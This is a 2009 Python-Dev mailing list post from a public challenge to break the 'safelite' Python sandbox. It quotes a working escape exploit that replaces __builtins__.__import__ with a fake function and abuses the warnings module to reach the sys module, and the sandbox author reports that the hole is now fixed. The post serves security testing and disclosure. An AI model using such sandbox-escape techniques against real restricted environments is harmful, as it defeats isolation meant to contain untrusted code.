[Python-Dev] Challenge: Please break this! [Now with blog post]

tav tav at espians.com
Tue Feb 24 09:27:01 CET 2009


Daniel emailed in the exploit below and it is pretty devastating. It
takes advantage of the fact that the warnings framework in 2.6+
dynamically imports modules without being explicitly called!!

I've fixed this hole in safelite.py, but would be interested to know
if there are other non-user-initiated dynamically imported modules?

Thanks Daniel for bringing this to our attention!


On Tue, Feb 24, 2009 at 4:46 AM, Daniel (ajax) Diniz <ajaksu at gmail.com> wrote:
> Here's my attempt. Uses the builtin warnings module.You might need to
> change 'args[1]' to 'args[2]' depending on your environment.
>
> I really don't like to post these to public MLs, but feel free to do
> so if you think no harm may arise from this one ;)
>
> Daniel
> ----
>
> from safelite import FileReader
>
> # Let's build a fake module
> warnings = __builtins__.__class__('warnings')
>
> # Fill it with deception
> warnings.default_action = "ignore"
>
> # And provide a supporting thug
> def __import__(*args):
>    try:
>        print "How nice:\n", args[1].keys()
>        global sys
>        sys = args[1]['sys']
>
>    except Exception, v:
>        print "Exception:", v
>    return warnings
>
> # Put the bogus module at the doorstep...
> __builtins__.warnings = warnings
>
> # and have the thug replacing the doorman
> __builtins__.__import__ = __import__
>
> # An unsuspecting costumer passes by...
> FileReader('safelite.py').seek(1.1)
>
> # ... and is brutally mugged :)
> print sys
> print dir(sys)
>



-- 
love, tav

plex:espians/tav | tav at espians.com | +44 (0) 7809 569 369
http://tav.espians.com | http://twitter.com/tav | skype:tavespian


More information about the Python-Dev mailing list